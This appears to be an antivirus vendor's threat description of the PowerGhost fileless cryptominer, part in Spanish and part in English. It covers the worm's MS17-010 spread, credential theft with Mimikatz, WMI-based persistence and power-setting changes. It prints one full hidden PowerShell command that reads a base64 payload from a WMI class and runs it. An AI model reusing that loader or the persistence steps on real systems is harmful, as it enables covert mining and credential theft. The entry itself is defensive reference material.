Fileless.POWERGHOST

It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Se aprovecha de las vulnerabilidades de software para propagarse por las redes.

Detalles de entrada

It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Instalación

Agrega los procesos siguientes:

• powershell -NoP -NonI -W Hidden `"`$mon = ([WmiClass] 'root\default:Window_Core_Flush_Cach').Properties['mon'].Value;`$funs = ([WmiClass] 'root\default:Window_Core_Flush_Cach').Properties['funs'].Value ;iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(`$funs)));Invoke-Command -ScriptBlock `$RemoteScriptBlock -ArgumentList @(`$mon, `$mon, 'Void', 0, '', '')`

Técnica de inicio automático

Inicia los servicios siguientes:

• RpcSs
• RpcLocator
• RemoteRegistry
• RpcEptMapper
• Winmgmt
• WinRM

Propagación

Se aprovecha de las vulnerabilidades de software siguientes para propagarse por las redes:

• Microsoft Windows SMB Server (MS17-010) Vulnerability

Finalización del proceso

Finaliza los procesos siguientes si detecta que se ejecutan en la memoria del sistema afectado:

• Powershell processes with an established TCP connection via port 80, or 14444
• Any processes with established connection to ports 3333, 5555, or 7777

Rutina de descarga

Guarda los archivos que descarga con los nombres siguientes:

• %User Temp%\{random characters}.exe → TrojanSpy.Win32.BLUTEAL.D
• %User Temp%\java-log-9527.log → contains shellcode
• /tmp/coreupdtes (for Unix platforms) → contains script to download and execute a cryptominer

Robo de información

Recopila los siguientes datos:

• User Credentials
• OS Version
• Computer Name
• Domain Name

Otros detalles

Hace lo siguiente:

• It creates IPSec Firewall Policy
  • Name: netbc
  • Function: Blocks tcp connections to infected machine via port 445 (SMB)
• It is capable of propagating in the local network via the following means:
  • SMB Exploit (MS17-010)
  • MSSQL and SSH Brute-Forcing
  • Dumping Windows Domain Credentials using any of the following techniques/tools
  • Mimikatz
  • Pass-The-Hash
• It creates the following WMI Class under ROOT\default:
  • Window_Core_Flush_Cach
    • WMI objects:
      • mimi - Mimikatz scripts
      • mon - Monero cryptominer
      • funs - Powershell Empire modules used for propagation or lateral movement
      • ipsu - List of IP addresses vulnerable for propagation
      • i17 - List of IP addresses vulnerable for SMB exploit
      • ver - PowerGhost version
      • sc - Shellcode
• It creates the following WMI Classes under ROOT\subscription to achieve persistence in the system:
  • CommandLineEventConsumer
    • Name: Systems Manage Consumer
    • Command: powershell.exe -NoP -NonI -W Hidden -E {base64 encoded command}
  • __EventFilter
    • Name: Systems Manage Filter
  • __FilterToConsumerBinding
• It modifies power configuration settings using the following commands:
  • powercfg /CHANGE -standby-timeout-ac 0 (Standby timeout set to 0 minutes)
  • powercfg /CHANGE -hibernate-timeout-ac 0 (Hibernate timeout set to 0 minutes)
  • powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000 (Power buttons and lid close action set to do nothing)